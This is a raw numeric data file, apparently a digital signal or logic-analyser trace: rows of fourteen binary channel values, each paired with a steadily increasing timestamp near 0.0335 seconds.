0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507168e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507420e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3507424e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3507444e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3507468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507476e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507568e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507768e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507944e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3507968e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3507996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508068e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508144e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508168e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508344e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3508348e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3508372e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3508396e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3508444e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3508468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508476e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508568e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508768e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508944e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3508972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3508996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509020e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3509024e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3509072e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3509092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509104e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509120e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509296e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509472e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509496e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509672e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509696e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509724e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509748e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509872e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509896e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509924e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509948e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3509972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3509996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510072e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510096e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510124e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510148e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510296e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510472e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510496e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510672e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510696e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510724e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510748e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510872e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510896e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510924e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510948e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3510972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3510996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511072e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511096e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511124e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511148e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511296e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511472e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511544e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511744e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511768e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3511868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3511892e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3511900e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3636620e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3636820e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,3.3636844e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3636876e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,3.3637188e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3637212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3637220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3637236e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3637260e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3637284e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3637312e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3637336e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3637364e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3637388e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3637412e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3637436e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637452e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637484e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637512e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637536e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3637564e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3637588e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3637612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637636e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637660e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3637668e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3637712e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3637740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637744e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3637932e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3637984e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638012e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638060e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638084e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638160e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638236e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638308e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638336e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3638340e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3638384e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3638412e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.3638416e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638420e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638436e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638460e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638508e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638584e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638732e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638784e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638836e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638860e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3638864e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3638912e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3638940e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.3638944e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3638948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3638988e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639012e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639064e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639164e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639212e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639240e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639264e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639316e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639340e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639364e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639440e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639464e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3639468e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3639492e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3639516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639524e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639564e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639612e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639664e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639788e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639812e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639864e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639940e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3639968e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3639992e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640016e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640116e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640164e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640192e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640216e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640244e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640268e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640316e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640340e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640364e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640392e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640416e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640468e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3640472e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3640492e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3640516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640524e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640564e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3640572e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3640620e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3640644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640652e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640740e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640764e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640792e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640816e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640892e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640916e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3640968e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3640992e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641168e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641192e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641216e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641316e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3641324e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3641368e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3641392e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,3.3641396e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641400e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641568e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641592e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641616e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641644e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641716e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641744e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641920e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641944e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3641972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3641996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642144e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642172e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642320e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642444e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3642468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3642492e-02 